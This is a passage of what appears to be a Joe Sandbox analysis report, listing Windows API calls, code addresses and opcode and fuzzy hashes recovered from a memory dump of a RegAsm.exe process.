                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 0040B12C
                                                                        • memcpy.MSVCRT ref: 0040B159
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ??3@$memcpy$mallocstrlen
                                                                        • String ID:
                                                                        • API String ID: 1171893557-0
                                                                        • Opcode ID: 8a001e82ca3730f1e98eedeca7a3bb7ead531333626601bff92a244b64e8cf14
                                                                        • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                        • Opcode Fuzzy Hash: 8a001e82ca3730f1e98eedeca7a3bb7ead531333626601bff92a244b64e8cf14
                                                                        • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                        APIs
                                                                        • memset.MSVCRT ref: 004144E7
                                                                          • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                          • Part of subcall function 0040A353: memcpy.MSVCRT ref: 0040A3A8
                                                                        • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                        • memset.MSVCRT ref: 0041451A
                                                                        • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                        • String ID:
                                                                        • API String ID: 1127616056-0
                                                                        • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                        • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                        • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                        • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                        APIs
                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,756F18FE,?,0041755F,?), ref: 00417452
                                                                        • malloc.MSVCRT ref: 00417459
                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,756F18FE,?,0041755F,?), ref: 00417478
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 0041747F
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide$??3@malloc
                                                                        • String ID:
                                                                        • API String ID: 4284152360-0
                                                                        • Opcode ID: 53c249c4ed26904e3077c8c6e0d5a5fb1c5dae0b3f1e23511c3111531268d4c8
                                                                        • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                        • Opcode Fuzzy Hash: 53c249c4ed26904e3077c8c6e0d5a5fb1c5dae0b3f1e23511c3111531268d4c8
                                                                        • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                                        • RegisterClassW.USER32(?), ref: 00412428
                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                        • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule$ClassCreateRegisterWindow
                                                                        • String ID:
                                                                        • API String ID: 2678498856-0
                                                                        • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                        • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                        • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                        • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                        APIs
                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                        • malloc.MSVCRT ref: 00417407
                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 00417425
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide$??3@malloc
                                                                        • String ID:
                                                                        • API String ID: 4284152360-0
                                                                        • Opcode ID: e8014e3e073e3038f16ce65d63843526aeb3a562c6a088246885bee1c6057e7d
                                                                        • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                        • Opcode Fuzzy Hash: e8014e3e073e3038f16ce65d63843526aeb3a562c6a088246885bee1c6057e7d
                                                                        • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                                        APIs
                                                                        • memset.MSVCRT ref: 0040F673
                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                                        • strlen.MSVCRT ref: 0040F6A2
                                                                        • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                        • String ID:
                                                                        • API String ID: 2754987064-0
                                                                        • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                        • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                        • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                        • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                        APIs
                                                                        • memset.MSVCRT ref: 0040F6E2
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                                        • strlen.MSVCRT ref: 0040F70D
                                                                        • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                        • String ID:
                                                                        • API String ID: 2754987064-0
                                                                        • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                        • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                        • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                        • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: wcscpy$CloseHandle
                                                                        • String ID: General
                                                                        • API String ID: 3722638380-26480598
                                                                        • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                        • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                        • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                        • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                        APIs
                                                                          • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                          • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                          • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                        • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                        • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                        • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                        • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                        • String ID:
                                                                        • API String ID: 764393265-0
                                                                        • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                        • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                        • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                        • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                        APIs
                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                        • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                        • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: Time$System$File$LocalSpecific
                                                                        • String ID:
                                                                        • API String ID: 979780441-0
                                                                        • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                        • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                        • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                        • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                        APIs
                                                                        • memcpy.MSVCRT ref: 004134E0
                                                                        • memcpy.MSVCRT ref: 004134F2
                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                        • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memcpy$DialogHandleModuleParam
                                                                        • String ID:
                                                                        • API String ID: 1386444988-0
                                                                        • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                        • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                        • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                        • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                        APIs
                                                                        • wcschr.MSVCRT ref: 0040F79E
                                                                        • wcschr.MSVCRT ref: 0040F7AC
                                                                          • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                          • Part of subcall function 0040AA8C: memcpy.MSVCRT ref: 0040AACB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: wcschr$memcpywcslen
                                                                        • String ID: "
                                                                        • API String ID: 1983396471-123907689
                                                                        • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                        • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                        • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                        • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: _snwprintfmemcpy
                                                                        • String ID: %2.2X
                                                                        • API String ID: 2789212964-323797159
                                                                        • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                        • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                        • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                        • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: _snwprintf
                                                                        • String ID: %%-%d.%ds
                                                                        • API String ID: 3988819677-2008345750
                                                                        • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                        • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                                        • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                        • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                                        APIs
                                                                        • memset.MSVCRT ref: 0040E770
                                                                        • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSendmemset
                                                                        • String ID: F^@
                                                                        • API String ID: 568519121-3652327722
                                                                        • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                        • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                        • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                        • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: PlacementWindowmemset
                                                                        • String ID: WinPos
                                                                        • API String ID: 4036792311-2823255486
                                                                        • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                        • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                        • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                        • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ??3@DeleteObject
                                                                        • String ID: r!A
                                                                        • API String ID: 1103273653-628097481
                                                                        • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                        • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                        • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                        • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memcpy$memset
                                                                        • String ID:
                                                                        • API String ID: 438689982-0
                                                                        • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                        • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                        • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                        • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ??2@$memset
                                                                        • String ID:
                                                                        • API String ID: 1860491036-0
                                                                        • Opcode ID: 132c9519558d853c1af1b7fa7761ae76911dbcbc7ff65e94ed4645376a2186b4
                                                                        • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                        • Opcode Fuzzy Hash: 132c9519558d853c1af1b7fa7761ae76911dbcbc7ff65e94ed4645376a2186b4
                                                                        • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ??2@
                                                                        • String ID:
                                                                        • API String ID: 1033339047-0
                                                                        • Opcode ID: 6589a97820dd4164dbe9b7b561e5d9da651562f836a554c3bd3b183484c6dcee
                                                                        • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                        • Opcode Fuzzy Hash: 6589a97820dd4164dbe9b7b561e5d9da651562f836a554c3bd3b183484c6dcee
                                                                        • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49